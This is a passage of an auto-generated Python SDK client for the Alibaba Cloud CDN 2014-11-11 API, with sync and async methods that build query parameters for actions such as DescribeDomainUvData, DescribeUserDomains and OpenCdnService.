) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainRegionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainRegionDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_region_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainRegionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainRegionDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_region_data(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_region_data_with_options(request, runtime)
async def describe_domain_region_data_async(
self,
request: cdn_20141111_models.DescribeDomainRegionDataRequest,
) -> cdn_20141111_models.DescribeDomainRegionDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_region_data_with_options_async(request, runtime)
def describe_domain_req_hit_rate_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainReqHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainReqHitRateDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_req_hit_rate_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainReqHitRateData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainReqHitRateDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_req_hit_rate_data(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_req_hit_rate_data_with_options(request, runtime)
async def describe_domain_req_hit_rate_data_async(
self,
request: cdn_20141111_models.DescribeDomainReqHitRateDataRequest,
) -> cdn_20141111_models.DescribeDomainReqHitRateDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_req_hit_rate_data_with_options_async(request, runtime)
def describe_domain_src_bps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcBpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_src_bps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcBpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_src_bps_data(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_src_bps_data_with_options(request, runtime)
async def describe_domain_src_bps_data_async(
self,
request: cdn_20141111_models.DescribeDomainSrcBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcBpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_src_bps_data_with_options_async(request, runtime)
def describe_domain_src_flow_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcFlowDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_src_flow_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.fix_time_gap):
query['FixTimeGap'] = request.fix_time_gap
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainSrcFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainSrcFlowDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_src_flow_data(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_src_flow_data_with_options(request, runtime)
async def describe_domain_src_flow_data_async(
self,
request: cdn_20141111_models.DescribeDomainSrcFlowDataRequest,
) -> cdn_20141111_models.DescribeDomainSrcFlowDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_src_flow_data_with_options_async(request, runtime)
def describe_domain_uv_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainUvData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainUvDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_uv_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainUvData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainUvDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_uv_data(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_uv_data_with_options(request, runtime)
async def describe_domain_uv_data_async(
self,
request: cdn_20141111_models.DescribeDomainUvDataRequest,
) -> cdn_20141111_models.DescribeDomainUvDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_uv_data_with_options_async(request, runtime)
    def describe_domains_by_source_with_options(
        self,
        request: cdn_20141111_models.DescribeDomainsBySourceRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
        """Synchronously call the CDN ``DescribeDomainsBySource`` RPC with explicit *runtime* options.

        Returns the deserialized ``DescribeDomainsBySourceResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        if not UtilClient.is_unset(request.sources):
            query['Sources'] = request.sources
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeDomainsBySource',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeDomainsBySourceResponse(),
            self.call_api(params, req, runtime)
        )
    async def describe_domains_by_source_with_options_async(
        self,
        request: cdn_20141111_models.DescribeDomainsBySourceRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
        """Asynchronous variant of ``describe_domains_by_source_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        if not UtilClient.is_unset(request.sources):
            query['Sources'] = request.sources
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeDomainsBySource',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeDomainsBySourceResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def describe_domains_by_source(
        self,
        request: cdn_20141111_models.DescribeDomainsBySourceRequest,
    ) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
        """Call the CDN ``DescribeDomainsBySource`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.describe_domains_by_source_with_options(request, runtime)
    async def describe_domains_by_source_async(
        self,
        request: cdn_20141111_models.DescribeDomainsBySourceRequest,
    ) -> cdn_20141111_models.DescribeDomainsBySourceResponse:
        """Async call of the CDN ``DescribeDomainsBySource`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.describe_domains_by_source_with_options_async(request, runtime)
    def describe_domains_usage_by_day_with_options(
        self,
        request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
        """Synchronously call the CDN ``DescribeDomainsUsageByDay`` RPC with explicit *runtime* options.

        Returns the deserialized ``DescribeDomainsUsageByDayResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeDomainsUsageByDay',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeDomainsUsageByDayResponse(),
            self.call_api(params, req, runtime)
        )
    async def describe_domains_usage_by_day_with_options_async(
        self,
        request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
        """Asynchronous variant of ``describe_domains_usage_by_day_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeDomainsUsageByDay',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeDomainsUsageByDayResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def describe_domains_usage_by_day(
        self,
        request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
    ) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
        """Call the CDN ``DescribeDomainsUsageByDay`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.describe_domains_usage_by_day_with_options(request, runtime)
    async def describe_domains_usage_by_day_async(
        self,
        request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
    ) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
        """Async call of the CDN ``DescribeDomainsUsageByDay`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.describe_domains_usage_by_day_with_options_async(request, runtime)
    def describe_refresh_quota_with_options(
        self,
        request: cdn_20141111_models.DescribeRefreshQuotaRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
        """Synchronously call the CDN ``DescribeRefreshQuota`` RPC with explicit *runtime* options.

        Returns the deserialized ``DescribeRefreshQuotaResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeRefreshQuota',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeRefreshQuotaResponse(),
            self.call_api(params, req, runtime)
        )
    async def describe_refresh_quota_with_options_async(
        self,
        request: cdn_20141111_models.DescribeRefreshQuotaRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
        """Asynchronous variant of ``describe_refresh_quota_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeRefreshQuota',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeRefreshQuotaResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def describe_refresh_quota(
        self,
        request: cdn_20141111_models.DescribeRefreshQuotaRequest,
    ) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
        """Call the CDN ``DescribeRefreshQuota`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.describe_refresh_quota_with_options(request, runtime)
    async def describe_refresh_quota_async(
        self,
        request: cdn_20141111_models.DescribeRefreshQuotaRequest,
    ) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
        """Async call of the CDN ``DescribeRefreshQuota`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.describe_refresh_quota_with_options_async(request, runtime)
    def describe_top_domains_by_flow_with_options(
        self,
        request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
        """Synchronously call the CDN ``DescribeTopDomainsByFlow`` RPC with explicit *runtime* options.

        Returns the deserialized ``DescribeTopDomainsByFlowResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.limit):
            query['Limit'] = request.limit
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.product):
            query['Product'] = request.product
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeTopDomainsByFlow',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeTopDomainsByFlowResponse(),
            self.call_api(params, req, runtime)
        )
    async def describe_top_domains_by_flow_with_options_async(
        self,
        request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
        """Asynchronous variant of ``describe_top_domains_by_flow_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.limit):
            query['Limit'] = request.limit
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.product):
            query['Product'] = request.product
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeTopDomainsByFlow',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeTopDomainsByFlowResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def describe_top_domains_by_flow(
        self,
        request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
    ) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
        """Call the CDN ``DescribeTopDomainsByFlow`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.describe_top_domains_by_flow_with_options(request, runtime)
    async def describe_top_domains_by_flow_async(
        self,
        request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
    ) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
        """Async call of the CDN ``DescribeTopDomainsByFlow`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.describe_top_domains_by_flow_with_options_async(request, runtime)
    def describe_user_domains_with_options(
        self,
        request: cdn_20141111_models.DescribeUserDomainsRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeUserDomainsResponse:
        """Synchronously call the CDN ``DescribeUserDomains`` RPC with explicit *runtime* options.

        Returns the deserialized ``DescribeUserDomainsResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.cdn_type):
            query['CdnType'] = request.cdn_type
        if not UtilClient.is_unset(request.check_domain_show):
            query['CheckDomainShow'] = request.check_domain_show
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.domain_search_type):
            query['DomainSearchType'] = request.domain_search_type
        if not UtilClient.is_unset(request.domain_status):
            query['DomainStatus'] = request.domain_status
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.page_number):
            query['PageNumber'] = request.page_number
        if not UtilClient.is_unset(request.page_size):
            query['PageSize'] = request.page_size
        if not UtilClient.is_unset(request.resource_group_id):
            query['ResourceGroupId'] = request.resource_group_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        if not UtilClient.is_unset(request.sources):
            query['Sources'] = request.sources
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeUserDomains',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeUserDomainsResponse(),
            self.call_api(params, req, runtime)
        )
    async def describe_user_domains_with_options_async(
        self,
        request: cdn_20141111_models.DescribeUserDomainsRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.DescribeUserDomainsResponse:
        """Asynchronous variant of ``describe_user_domains_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.cdn_type):
            query['CdnType'] = request.cdn_type
        if not UtilClient.is_unset(request.check_domain_show):
            query['CheckDomainShow'] = request.check_domain_show
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.domain_search_type):
            query['DomainSearchType'] = request.domain_search_type
        if not UtilClient.is_unset(request.domain_status):
            query['DomainStatus'] = request.domain_status
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.page_number):
            query['PageNumber'] = request.page_number
        if not UtilClient.is_unset(request.page_size):
            query['PageSize'] = request.page_size
        if not UtilClient.is_unset(request.resource_group_id):
            query['ResourceGroupId'] = request.resource_group_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        if not UtilClient.is_unset(request.sources):
            query['Sources'] = request.sources
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='DescribeUserDomains',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.DescribeUserDomainsResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def describe_user_domains(
        self,
        request: cdn_20141111_models.DescribeUserDomainsRequest,
    ) -> cdn_20141111_models.DescribeUserDomainsResponse:
        """Call the CDN ``DescribeUserDomains`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.describe_user_domains_with_options(request, runtime)
    async def describe_user_domains_async(
        self,
        request: cdn_20141111_models.DescribeUserDomainsRequest,
    ) -> cdn_20141111_models.DescribeUserDomainsResponse:
        """Async call of the CDN ``DescribeUserDomains`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.describe_user_domains_with_options_async(request, runtime)
    def open_cdn_service_with_options(
        self,
        request: cdn_20141111_models.OpenCdnServiceRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.OpenCdnServiceResponse:
        """Synchronously call the CDN ``OpenCdnService`` RPC with explicit *runtime* options.

        Returns the deserialized ``OpenCdnServiceResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.internet_charge_type):
            query['InternetChargeType'] = request.internet_charge_type
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='OpenCdnService',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.OpenCdnServiceResponse(),
            self.call_api(params, req, runtime)
        )
    async def open_cdn_service_with_options_async(
        self,
        request: cdn_20141111_models.OpenCdnServiceRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.OpenCdnServiceResponse:
        """Asynchronous variant of ``open_cdn_service_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.internet_charge_type):
            query['InternetChargeType'] = request.internet_charge_type
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
